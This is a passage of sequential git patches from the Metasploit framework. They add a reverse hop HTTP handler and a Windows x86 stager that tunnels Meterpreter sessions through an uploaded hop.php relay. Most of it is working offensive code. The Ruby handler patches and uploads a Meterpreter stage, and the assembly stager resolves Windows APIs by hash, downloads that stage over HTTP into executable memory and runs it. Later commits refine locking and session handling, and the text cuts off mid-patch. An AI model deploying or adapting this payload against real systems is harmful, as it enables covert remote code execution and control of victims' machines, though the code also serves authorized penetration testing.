self.mclient.request_raw( + 'method' => 'POST', + 'uri' => self.control, + 'data' => resp.body, + 'headers' => {'X-urlfrag' => self.current_url} + ) + # if receiving POST data, hop does not send back data, so we can stop here + self.mclient.send_recv(crequest) + end + end + + # + # Return the URI of the hop point. + # + def full_uri + uri = datastore['HOPURL'] + return uri if uri.end_with? '/' + return "#{uri}/" if uri.end_with? '?' + "#{uri}?/" + end + + # + # Returns a string representation of the local hop + # + def localinfo + "Hop client" + end + + # + # Returns the URL of the remote hop end + # + def peerinfo + URI(full_uri).host + end + + # + # Initializes the Hop HTTP tunneling handler. + # + def initialize(info = {}) + super + + register_options( + [ + OptString.new('HOPURL', [ true, "The full URL of the hop script, e.g. http://a.b/hop.php" ]) + ], Msf::Handler::ReverseHopHttp) + + end + + # + # Generates and sends a stage up to the hop point to be ready for the next client + # + def send_new_stage(control) + conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) + url = full_uri + conn_id + "/\x00" + + print_status("Preparing stage for next session #{conn_id}") + blob = self.stage_payload + + # Replace the user agent string with our option + i = blob.index("METERPRETER_UA\x00") + if i + str = datastore['MeterpreterUserAgent'][0,255] + "\x00" + blob[i, str.length] = str + end + + # Replace the transport string first (TRANSPORT_SOCKET_SSL) + i = blob.index("METERPRETER_TRANSPORT_SSL") + if i + str = "METERPRETER_TRANSPORT_HTTP#{ssl? ? "S" : ""}\x00" + blob[i, str.length] = str + end + + conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) + i = blob.index("https://" + ("X" * 256)) + if i + url = full_uri + conn_id + "/\x00" + blob[i, url.length] = url + end + print_status("Patched URL at offset #{i}...") + + i = blob.index([0xb64be661].pack("V")) + if i + str = [ datastore['SessionExpirationTimeout'] ].pack("V") + blob[i, str.length] = str + end + + i = blob.index([0xaf79257f].pack("V")) + if i + str = [ datastore['SessionCommunicationTimeout'] ].pack("V") + blob[i, str.length] = str + end + + blob = encode_stage(blob) + + #send up + crequest = self.mclient.request_raw( + 'method' => 'POST', + 'uri' => control, + 'data' => blob, + 'headers' => {'X-init' => 'true'} + ) + res = self.mclient.send_recv(crequest) + print_status("Uploaded stage to hop #{full_uri}") + print_error(res.error) if res.error + + #return conn info + [conn_id, url] + end + + attr_accessor :monitor_thread # :nodoc: + attr_accessor :handlers # :nodoc: + attr_accessor :mclient # :nodoc: + attr_accessor :current_url # :nodoc: + attr_accessor :control # :nodoc: + +end + +end +end + diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb new file mode 100644 index 0000000000..dbe5fea11d --- /dev/null +++ b/modules/payloads/stagers/windows/reverse_hop_http.rb @@ -0,0 +1,292 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'uri' +require 'msf/core' +require 'msf/core/handler/reverse_hop_http' + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Windows + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Reverse Hop HTTP Stager', + 'Description' => 'Tunnel communication over an HTTP hop point', + 'Author' => ['scriptjunkie ', 'hdm'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseHopHttp, + 'Convention' => 'sockedi http', + 'Stager' => + { + 'Offsets' => + { + # None, they get embedded in the shellcode + } + } + )) + + deregister_options('LHOST', 'LPORT') + + register_options([ + OptString.new('HOPURL', + [ true, "The full URL of the hop script", "http://example.com/hop.php" ] + ) + ], self.class) + end + + # + # Do not transmit the stage over the connection. We handle this via HTTP + # + def stage_over_connection? + false + end + + # + # Generate the first stage + # + def generate + uri = URI(datastore['HOPURL']) + #create actual payload + payload_data = <Ldr + mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list +next_mod: + mov esi, [edx+40] ; Get pointer to modules name (unicode string) + movzx ecx, word [edx+38] ; Set ECX to the length we want to check + xor edi, edi ; Clear EDI which will store the hash of the module name +loop_modname: ; + xor eax, eax ; Clear EAX + lodsb ; Read in the next byte of the name + cmp al, 'a' ; Some versions of Windows use lower case module names + jl not_lowercase ; + sub al, 0x20 ; If so normalise to uppercase +not_lowercase: ; + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + loop loop_modname ; Loop until we have read enough + ; We now have the module hash computed + push edx ; Save the current position in the module list for later + push edi ; Save the current module hash for later + ; Proceed to iterate the export address table, + mov edx, [edx+16] ; Get this modules base address + mov eax, [edx+60] ; Get PE header + add eax, edx ; Add the modules base address + mov eax, [eax+120] ; Get export tables RVA + test eax, eax ; Test if no export address table is present + jz get_next_mod1 ; If no EAT present, process the next module + add eax, edx ; Add the modules base address + push eax ; Save the current modules EAT + mov ecx, [eax+24] ; Get the number of function names + mov ebx, [eax+32] ; Get the rva of the function names + add ebx, edx ; Add the modules base address + ; Computing the module hash + function hash +get_next_func: ; + jecxz get_next_mod ; When we reach the start of the EAT (we search backwards) process next mod + dec ecx ; Decrement the function name counter + mov esi, [ebx+ecx*4] ; Get rva of next module name + add esi, edx ; Add the modules base address + xor edi, edi ; Clear EDI which will store the hash of the function name + ; And compare it to the one we want +loop_funcname: ; + xor eax, eax ; Clear EAX + lodsb ; Read in the next byte of the ASCII function name + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + cmp al, ah ; Compare AL (the next byte from the name) to AH (null) + jne loop_funcname ; If we have not reached the null terminator, continue + add edi, [ebp-8] ; Add the current module hash to the function hash + cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for + jnz get_next_func ; Go compute the next function hash if we have not found it + ; If found, fix up stack, call the function and then value else compute the next one... + pop eax ; Restore the current modules EAT + mov ebx, [eax+36] ; Get the ordinal table rva + add ebx, edx ; Add the modules base address + mov cx, [ebx+2*ecx] ; Get the desired functions ordinal + mov ebx, [eax+28] ; Get the function addresses table rva + add ebx, edx ; Add the modules base address + mov eax, [ebx+4*ecx] ; Get the desired functions RVA + add eax, edx ; Add the modules base address to get the functions actual VA + ; We now fix up the stack and perform the call to the desired function... +finish: + mov [esp+36], eax ; Overwrite the old EAX value with the desired api address + pop ebx ; Clear off the current modules hash + pop ebx ; Clear off the current position in the module list + popad ; Restore all of the callers registers, bar EAX, ECX and EDX + pop ecx ; Pop off the origional return address our caller will have pushed + pop edx ; Pop off the hash value our caller will have pushed + push ecx ; Push back the correct return value + jmp eax ; Jump into the required function + ; We now automagically return to the correct caller... +get_next_mod: ; + pop eax ; Pop off the current (now the previous) modules EAT +get_next_mod1: ; + pop edi ; Pop off the current (now the previous) modules hash + pop edx ; Restore our position in the module list + mov edx, [edx] ; Get the next module + jmp.i8 next_mod ; Process this module + +; actual routine +start: + pop ebp ; get ptr to block_api routine + +; Input: EBP must be the address of 'api_call'. +; Output: EDI will be the socket for the connection to the server +; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) +load_wininet: + push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. + push 0x696e6977 ; ... + push esp ; Push a pointer to the "wininet" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "wininet" ) + +internetopen: + xor edi,edi + push edi ; DWORD dwFlags + push edi ; LPCTSTR lpszProxyBypass + push edi ; LPCTSTR lpszProxyName + push edi ; DWORD dwAccessType (PRECONFIG = 0) + push 0 ; NULL pointer + push esp ; LPCTSTR lpszAgent ("\x00") + push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + call ebp + + jmp.i8 dbl_get_server_host + +internetconnect: + pop ebx ; Save the hostname pointer + xor ecx, ecx + push ecx ; DWORD_PTR dwContext (NULL) + push ecx ; dwFlags + push 3 ; DWORD dwService (INTERNET_SERVICE_HTTP) + push ecx ; password + push ecx ; username + push #{uri.port} ; PORT + push ebx ; HOSTNAME + push eax ; HINTERNET hInternet + push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) + call ebp + + jmp get_server_uri + +httpopenrequest: + pop ecx + xor edx, edx ; NULL + push edx ; dwContext (NULL) + push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags + ;0x80000000 | ; INTERNET_FLAG_RELOAD + ;0x04000000 | ; INTERNET_NO_CACHE_WRITE + ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT + ;0x00000200 | ; INTERNET_FLAG_NO_UI + ;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION + push edx ; accept types + push edx ; referrer + push edx ; version + push ecx ; url + push edx ; method + push eax ; hConnection + push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) + call ebp + mov esi, eax ; hHttpRequest + +set_retry: + push 0x10 + pop ebx + +httpsendrequest: + xor edi, edi + push edi ; optional length + push edi ; optional + push edi ; dwHeadersLength + push edi ; headers + push esi ; hHttpRequest + push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) + call ebp + test eax,eax + jnz allocate_memory + +try_it_again: + dec ebx + jz failure + jmp.i8 httpsendrequest + +dbl_get_server_host: + jmp get_server_host + +get_server_uri: + call httpopenrequest + +server_uri: + db "#{Rex::Text.hexify(uri.request_uri).chomp}?/12345", 0x00 + +failure: + push 0x56A2B5F0 ; hardcoded to exitprocess for size + call ebp + +allocate_memory: + push 0x40 ; PAGE_EXECUTE_READWRITE + push 0x1000 ; MEM_COMMIT + push 0x00400000 ; Stage allocation (8Mb ought to do us) + push edi ; NULL as we dont care where the allocation is + push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); + +download_prep: + xchg eax, ebx ; place the allocated base address in ebx + push ebx ; store a copy of the stage base address on the stack + push ebx ; temporary storage for bytes read count + mov edi, esp ; &bytesRead + +download_more: + push edi ; &bytesRead + push 8192 ; read length + push ebx ; buffer + push esi ; hRequest + push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + call ebp + + test eax,eax ; download failed? (optional?) + jz failure + + mov eax, [edi] + add ebx, eax ; buffer += bytes_received + + test eax,eax ; optional? + jnz download_more ; continue until it returns 0 + pop eax ; clear the temporary storage + +execute_stage: + ret ; dive into the stored stage address + +get_server_host: + call internetconnect + +server_host: +db "#{Rex::Text.hexify(uri.host).chomp}", 0x00 + +EOS + self.module_info['Stager']['Assembly'] = payload_data.to_s + super + end + + # + # Always wait at least 20 seconds for this payload (due to staging delays) + # + def wfs_delay + 20 + end +end From 85ae32775aa2dd2652a783b1689b8bf7b542d5e3 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Mon, 30 Dec 2013 23:20:15 -0600 Subject: [PATCH 019/853] Fix to make migrate work; use the full URL. --- lib/msf/core/handler/reverse_hop_http.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index 71e27d68d9..e80fc9370c 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -108,7 +108,7 @@ module ReverseHopHttp create_session(hophttp, { :passive_dispatcher => self, :conn_id => conn_id, - :url => urlpath, + :url => uri.to_s + conn_id + "/\x00", :expiration => datastore['SessionExpirationTimeout'].to_i, :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, :ssl => false, From 62f42c57a92e4e43223b6e13eaa1bbcaefe22fab Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Mon, 30 Dec 2013 23:38:09 -0600 Subject: [PATCH 020/853] Add instructions for uploading hop.php --- modules/payloads/stagers/windows/reverse_hop_http.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb index dbe5fea11d..9109738220 100644 --- a/modules/payloads/stagers/windows/reverse_hop_http.rb +++ b/modules/payloads/stagers/windows/reverse_hop_http.rb @@ -15,7 +15,9 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse Hop HTTP Stager', - 'Description' => 'Tunnel communication over an HTTP hop point', + 'Description' => "Tunnel communication over an HTTP hop point (note you must first upload "+ + "the hop.php found at #{File.expand_path("../../../../data/php/hop.php", __FILE__)} "+ + "to the HTTP server you wish to use as a hop)", 'Author' => ['scriptjunkie ', 'hdm'], 'License' => MSF_LICENSE, 'Platform' => 'win', From a6a731c8ee937abc4678f0f3049c67840e9a246f Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Fri, 3 Jan 2014 17:13:42 -0600 Subject: [PATCH 021/853] Keep stage until replaced, nil check, prettify. --- data/php/hop.php | 2 +- lib/msf/core/handler/reverse_hop_http.rb | 29 ++++++++++++------------ 2 files changed, 16 insertions(+), 15 deletions(-) diff --git a/data/php/hop.php b/data/php/hop.php index 08cefe5df8..d7ab92e82c 100644 --- a/data/php/hop.php +++ b/data/php/hop.php @@ -60,5 +60,5 @@ if($url === "/control"){ fclose($f); //Initial query will be a GET and have a 12345 in it }else if(strpos($url, "12345") !== FALSE){ - findSendDelete($tempdir, "init"); + readfile($tempdir."/init"); } diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index e80fc9370c..4a9f458f5b 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -68,17 +68,18 @@ module ReverseHopHttp end @@hophandlers[full_uri] = self self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri, - self) do |uri, hophttp| + self) do |uri, hop_http| control = "#{uri.request_uri}control" - hophttp.control = control - hophttp.send_new_stage(control) # send stage to hop + hop_http.control = control + hop_http.send_new_stage(control) # send stage to hop @finish = false delay = 1 # poll delay - until @finish and hophttp.handlers.empty? + until @finish and hop_http.handlers.empty? sleep delay delay = delay + 1 if delay < 10 # slow down if we're not getting anything - crequest = hophttp.mclient.request_raw({'method' => 'GET', 'uri' => control}) - res = hophttp.mclient.send_recv(crequest) # send poll to the hop + crequest = hop_http.mclient.request_raw({'method' => 'GET', 'uri' => control}) + res = hop_http.mclient.send_recv(crequest) # send poll to the hop + next if res == nil if res.error print_error(res.error) next @@ -86,7 +87,7 @@ module ReverseHopHttp # validate response received = res.body - magic = hophttp.magic + magic = hop_http.magic next if received.length < 12 or received.slice!(0, magic.length) != magic # good response @@ -95,17 +96,17 @@ module ReverseHopHttp urlpath = received.slice!(0,urlen) #received is now the binary contents of the message - if hophttp.handlers.include? urlpath + if hop_http.handlers.include? urlpath pack = Rex::Proto::Http::Packet.new pack.body = received - hophttp.current_url = urlpath - hophttp.handlers[urlpath].call(hophttp, pack) + hop_http.current_url = urlpath + hop_http.handlers[urlpath].call(hop_http, pack) else #New session! conn_id = urlpath.gsub("/","") # Short-circuit the payload's handle_connection processing for create_session # We are the dispatcher since we need to handle the comms to the hop - create_session(hophttp, { + create_session(hop_http, { :passive_dispatcher => self, :conn_id => conn_id, :url => uri.to_s + conn_id + "/\x00", @@ -114,10 +115,10 @@ module ReverseHopHttp :ssl => false, }) # send new stage to hop so next inbound session will get a unique ID. - hophttp.send_new_stage(control) + hop_http.send_new_stage(control) end end - hophttp.monitor_thread = nil #make sure we're out + hop_http.monitor_thread = nil #make sure we're out @@hophandlers.delete(full_uri) end end @@ -258,7 +259,7 @@ module ReverseHopHttp ) res = self.mclient.send_recv(crequest) print_status("Uploaded stage to hop #{full_uri}") - print_error(res.error) if res.error + print_error(res.error) if res != nil and res.error #return conn info [conn_id, url] From 16e1280b8d25b7aa586863ad1ab68db837bdc8bb Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Mon, 6 Jan 2014 20:51:03 -0600 Subject: [PATCH 022/853] Style guide fixes. --- lib/msf/core/handler/reverse_hop_http.rb | 43 ++++++++++++------------ 1 file changed, 22 insertions(+), 21 deletions(-) diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index 4a9f458f5b..875189ccc6 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -18,14 +18,23 @@ module ReverseHopHttp include Msf::Handler::ReverseHttp - @@hophandlers = {} # Keeps track of what hops have active handlers - # # Magic bytes to know we are talking to a valid hop # - def magic - 'TzGq' - end + MAGIC = 'TzGq' + + # hop_handlers is a class-level instance variable + class << self; attr_accessor :hop_handlers end + attr_accessor :monitor_thread # :nodoc: + attr_accessor :handlers # :nodoc: + attr_accessor :mclient # :nodoc: + attr_accessor :current_url # :nodoc: + attr_accessor :control # :nodoc: + + # + # Keeps track of what hops have active handlers + # + @hop_handlers = {} # # Returns the string representation of the handler type @@ -63,10 +72,10 @@ module ReverseHopHttp } ) #First we need to verify we will not stomp on another handler's hop - if @@hophandlers.has_key? full_uri + if ReverseHopHttp.hop_handlers.has_key?(full_uri) raise RuntimeError, "Already running a handler for hop #{full_uri}." end - @@hophandlers[full_uri] = self + ReverseHopHttp.hop_handlers[full_uri] = self self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri, self) do |uri, hop_http| control = "#{uri.request_uri}control" @@ -74,7 +83,7 @@ module ReverseHopHttp hop_http.send_new_stage(control) # send stage to hop @finish = false delay = 1 # poll delay - until @finish and hop_http.handlers.empty? + until @finish && hop_http.handlers.empty? sleep delay delay = delay + 1 if delay < 10 # slow down if we're not getting anything crequest = hop_http.mclient.request_raw({'method' => 'GET', 'uri' => control}) @@ -87,8 +96,7 @@ module ReverseHopHttp # validate response received = res.body - magic = hop_http.magic - next if received.length < 12 or received.slice!(0, magic.length) != magic + next if received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC # good response delay = 0 # we're talking, speed up @@ -119,7 +127,7 @@ module ReverseHopHttp end end hop_http.monitor_thread = nil #make sure we're out - @@hophandlers.delete(full_uri) + ReverseHopHttp.hop_handlers.delete(full_uri) end end @@ -172,8 +180,8 @@ module ReverseHopHttp # def full_uri uri = datastore['HOPURL'] - return uri if uri.end_with? '/' - return "#{uri}/" if uri.end_with? '?' + return uri if uri.end_with?('/') + return "#{uri}/" if uri.end_with?('?') "#{uri}?/" end @@ -259,20 +267,13 @@ module ReverseHopHttp ) res = self.mclient.send_recv(crequest) print_status("Uploaded stage to hop #{full_uri}") - print_error(res.error) if res != nil and res.error + print_error(res.error) if res != nil && res.error #return conn info [conn_id, url] end - attr_accessor :monitor_thread # :nodoc: - attr_accessor :handlers # :nodoc: - attr_accessor :mclient # :nodoc: - attr_accessor :current_url # :nodoc: - attr_accessor :control # :nodoc: - end end end - From 9c8c16d238d7424d47cb6b5483fe539c6319a923 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Tue, 7 Jan 2014 16:15:38 -0600 Subject: [PATCH 023/853] Allow multiple handlers to use same hop. --- lib/msf/core/handler/reverse_hop_http.rb | 23 +++++++++++++++++------ 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index 875189ccc6..d9911b12ec 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -30,6 +30,7 @@ module ReverseHopHttp attr_accessor :mclient # :nodoc: attr_accessor :current_url # :nodoc: attr_accessor :control # :nodoc: + attr_accessor :refs # :nodoc: # # Keeps track of what hops have active handlers @@ -63,7 +64,7 @@ module ReverseHopHttp # def start_handler uri = URI(full_uri) - #Our HTTP client for talking to the hop + # Our HTTP client for talking to the hop self.mclient = Rex::Proto::Http::Client.new( uri.host, uri.port, @@ -71,19 +72,25 @@ module ReverseHopHttp 'Msf' => framework } ) - #First we need to verify we will not stomp on another handler's hop + @running = true # So we know we can stop it + # If someone is already monitoring this hop, bump the refcount instead of starting a new thread if ReverseHopHttp.hop_handlers.has_key?(full_uri) - raise RuntimeError, "Already running a handler for hop #{full_uri}." + ReverseHopHttp.hop_handlers[full_uri].refs += 1 + return end + + # Sometimes you just have to do everything yourself. + # Declare ownership of this hop and spawn a thread to monitor it. + self.refs = 1 ReverseHopHttp.hop_handlers[full_uri] = self self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri, self) do |uri, hop_http| control = "#{uri.request_uri}control" hop_http.control = control hop_http.send_new_stage(control) # send stage to hop - @finish = false delay = 1 # poll delay - until @finish && hop_http.handlers.empty? + # Continue to loop as long as at least one handler or one session is depending on us + until hop_http.refs < 1 && hop_http.handlers.empty? sleep delay delay = delay + 1 if delay < 10 # slow down if we're not getting anything crequest = hop_http.mclient.request_raw({'method' => 'GET', 'uri' => control}) @@ -135,7 +142,11 @@ module ReverseHopHttp # Stops the handler and monitoring thread # def stop_handler - @finish = true + # stop_handler is called like 3 times, don't decrement refcount unless we're still running + if @running + ReverseHopHttp.hop_handlers[full_uri].refs -= 1 + @running = false + end end # From a83ca2b8d6170a334525c88b6af1eac59eaa7783 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Wed, 8 Jan 2014 17:37:56 -0600 Subject: [PATCH 024/853] Ghost sessions fix, fewer selfies, cleaner code --- lib/msf/core/handler/reverse_hop_http.rb | 30 ++++++++++++++---------- 1 file changed, 17 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index d9911b12ec..e336959a5b 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -27,6 +27,7 @@ module ReverseHopHttp class << self; attr_accessor :hop_handlers end attr_accessor :monitor_thread # :nodoc: attr_accessor :handlers # :nodoc: + attr_accessor :closed_handlers # :nodoc: attr_accessor :mclient # :nodoc: attr_accessor :current_url # :nodoc: attr_accessor :control # :nodoc: @@ -57,6 +58,7 @@ module ReverseHopHttp # def setup_handler self.handlers = {} + self.closed_handlers = {} end # @@ -95,7 +97,7 @@ module ReverseHopHttp delay = delay + 1 if delay < 10 # slow down if we're not getting anything crequest = hop_http.mclient.request_raw({'method' => 'GET', 'uri' => control}) res = hop_http.mclient.send_recv(crequest) # send poll to the hop - next if res == nil + next if res.nil? if res.error print_error(res.error) next @@ -116,7 +118,7 @@ module ReverseHopHttp pack.body = received hop_http.current_url = urlpath hop_http.handlers[urlpath].call(hop_http, pack) - else + elsif !closed_handlers.include? urlpath #New session! conn_id = urlpath.gsub("/","") # Short-circuit the payload's handle_connection processing for create_session @@ -154,14 +156,15 @@ module ReverseHopHttp # def add_resource(res, opts={}) self.handlers[res] = opts['Proc'] - start_handler if self.monitor_thread == nil + start_handler if monitor_thread.nil? end # # Removes a resource. # def remove_resource(res) - self.handlers.delete(res) + handlers.delete(res) + closed_handlers[res] = true end # @@ -175,14 +178,14 @@ module ReverseHopHttp # def send_response(resp) if not resp.body.empty? - crequest = self.mclient.request_raw( + crequest = mclient.request_raw( 'method' => 'POST', - 'uri' => self.control, + 'uri' => control, 'data' => resp.body, - 'headers' => {'X-urlfrag' => self.current_url} + 'headers' => {'X-urlfrag' => current_url} ) # if receiving POST data, hop does not send back data, so we can stop here - self.mclient.send_recv(crequest) + mclient.send_recv(crequest) end end @@ -207,7 +210,8 @@ module ReverseHopHttp # Returns the URL of the remote hop end # def peerinfo - URI(full_uri).host + uri = URI(full_uri) + "#{uri.host}:#{uri.port}" end # @@ -231,7 +235,7 @@ module ReverseHopHttp url = full_uri + conn_id + "/\x00" print_status("Preparing stage for next session #{conn_id}") - blob = self.stage_payload + blob = stage_payload # Replace the user agent string with our option i = blob.index("METERPRETER_UA\x00") @@ -270,15 +274,15 @@ module ReverseHopHttp blob = encode_stage(blob) #send up - crequest = self.mclient.request_raw( + crequest = mclient.request_raw( 'method' => 'POST', 'uri' => control, 'data' => blob, 'headers' => {'X-init' => 'true'} ) - res = self.mclient.send_recv(crequest) + res = mclient.send_recv(crequest) print_status("Uploaded stage to hop #{full_uri}") - print_error(res.error) if res != nil && res.error + print_error(res.error) if !res.nil? && res.error #return conn info [conn_id, url] From b0d2949f9a4c5fe36a9180c9eb3493a653cb4244 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Wed, 8 Jan 2014 17:58:42 -0600 Subject: [PATCH 025/853] Ensure no race conditions on handlers Configurable WfsDelay --- lib/msf/core/handler/reverse_hop_http.rb | 21 +++++++++++++------ .../stagers/windows/reverse_hop_http.rb | 8 +------ 2 files changed, 16 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index e336959a5b..2fb807e801 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -32,6 +32,7 @@ module ReverseHopHttp attr_accessor :current_url # :nodoc: attr_accessor :control # :nodoc: attr_accessor :refs # :nodoc: + attr_accessor :lock # :nodoc: # # Keeps track of what hops have active handlers @@ -59,14 +60,16 @@ module ReverseHopHttp def setup_handler self.handlers = {} self.closed_handlers = {} + self.lock = Mutex.new end # # Starts the handler along with a monitoring thread to handle data transfer # def start_handler + # Our HTTP client and URL for talking to the hop uri = URI(full_uri) - # Our HTTP client for talking to the hop + self.control = "#{uri.request_uri}control" self.mclient = Rex::Proto::Http::Client.new( uri.host, uri.port, @@ -87,9 +90,7 @@ module ReverseHopHttp ReverseHopHttp.hop_handlers[full_uri] = self self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri, self) do |uri, hop_http| - control = "#{uri.request_uri}control" - hop_http.control = control - hop_http.send_new_stage(control) # send stage to hop + hop_http.send_new_stage # send stage to hop delay = 1 # poll delay # Continue to loop as long as at least one handler or one session is depending on us until hop_http.refs < 1 && hop_http.handlers.empty? @@ -112,13 +113,17 @@ module ReverseHopHttp urlen = received.slice!(0,4).unpack('V')[0] urlpath = received.slice!(0,urlen) + # do not want handlers to change while we dispatch this + hop_http.lock.lock #received is now the binary contents of the message if hop_http.handlers.include? urlpath pack = Rex::Proto::Http::Packet.new pack.body = received hop_http.current_url = urlpath hop_http.handlers[urlpath].call(hop_http, pack) + hop_http.lock.unlock elsif !closed_handlers.include? urlpath + hop_http.lock.unlock #New session! conn_id = urlpath.gsub("/","") # Short-circuit the payload's handle_connection processing for create_session @@ -132,7 +137,9 @@ module ReverseHopHttp :ssl => false, }) # send new stage to hop so next inbound session will get a unique ID. - hop_http.send_new_stage(control) + hop_http.send_new_stage + else + hop_http.lock.unlock end end hop_http.monitor_thread = nil #make sure we're out @@ -163,8 +170,10 @@ module ReverseHopHttp # Removes a resource. # def remove_resource(res) + lock.lock handlers.delete(res) closed_handlers[res] = true + lock.unlock end # @@ -230,7 +239,7 @@ module ReverseHopHttp # # Generates and sends a stage up to the hop point to be ready for the next client # - def send_new_stage(control) + def send_new_stage conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) url = full_uri + conn_id + "/\x00" diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb index 9109738220..2332562a41 100644 --- a/modules/payloads/stagers/windows/reverse_hop_http.rb +++ b/modules/payloads/stagers/windows/reverse_hop_http.rb @@ -24,6 +24,7 @@ module Metasploit3 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseHopHttp, 'Convention' => 'sockedi http', + 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Stager' => { 'Offsets' => @@ -284,11 +285,4 @@ EOS self.module_info['Stager']['Assembly'] = payload_data.to_s super end - - # - # Always wait at least 20 seconds for this payload (due to staging delays) - # - def wfs_delay - 20 - end end From c0983138a097df6d1a9e1db5e9efc15bbd2ce670 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Thu, 13 Feb 2014 03:38:29 -0600 Subject: [PATCH 026/853] Fix wrapping errors on long domains. --- modules/payloads/stagers/windows/reverse_hop_http.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb index 2332562a41..c33cb09ba1 100644 --- a/modules/payloads/stagers/windows/reverse_hop_http.rb +++ b/modules/payloads/stagers/windows/reverse_hop_http.rb @@ -234,7 +234,7 @@ get_server_uri: call httpopenrequest server_uri: - db "#{Rex::Text.hexify(uri.request_uri).chomp}?/12345", 0x00 + db "#{Rex::Text.hexify(uri.request_uri, 99999).chomp}?/12345", 0x00 failure: push 0x56A2B5F0 ; hardcoded to exitprocess for size @@ -279,7 +279,7 @@ get_server_host: call internetconnect server_host: -db "#{Rex::Text.hexify(uri.host).chomp}", 0x00 +db "#{Rex::Text.hexify(uri.host, 99999).chomp}", 0x00 EOS self.module_info['Stager']['Assembly'] = payload_data.to_s From 022c52d0877ec9e0fbd28c5baaa215dbf45d977b Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Thu, 13 Feb 2014 13:42:07 -0600 Subject: [PATCH 027/853] Added bundling to handle many sessions at once. --- data/php/hop.php | 10 ++-- lib/msf/core/handler/reverse_hop_http.rb | 68 ++++++++++++------------ 2 files changed, 42 insertions(+), 36 deletions(-) diff --git a/data/php/hop.php b/data/php/hop.php index d7ab92e82c..c9f323657a 100644 --- a/data/php/hop.php +++ b/data/php/hop.php @@ -10,7 +10,7 @@ $url = $_SERVER["QUERY_STRING"]; //like /path/hop.php?/uRIcksm_lOnGidENTifIEr //Looks for a file with a name or contents prefix, if found, send it and deletes it -function 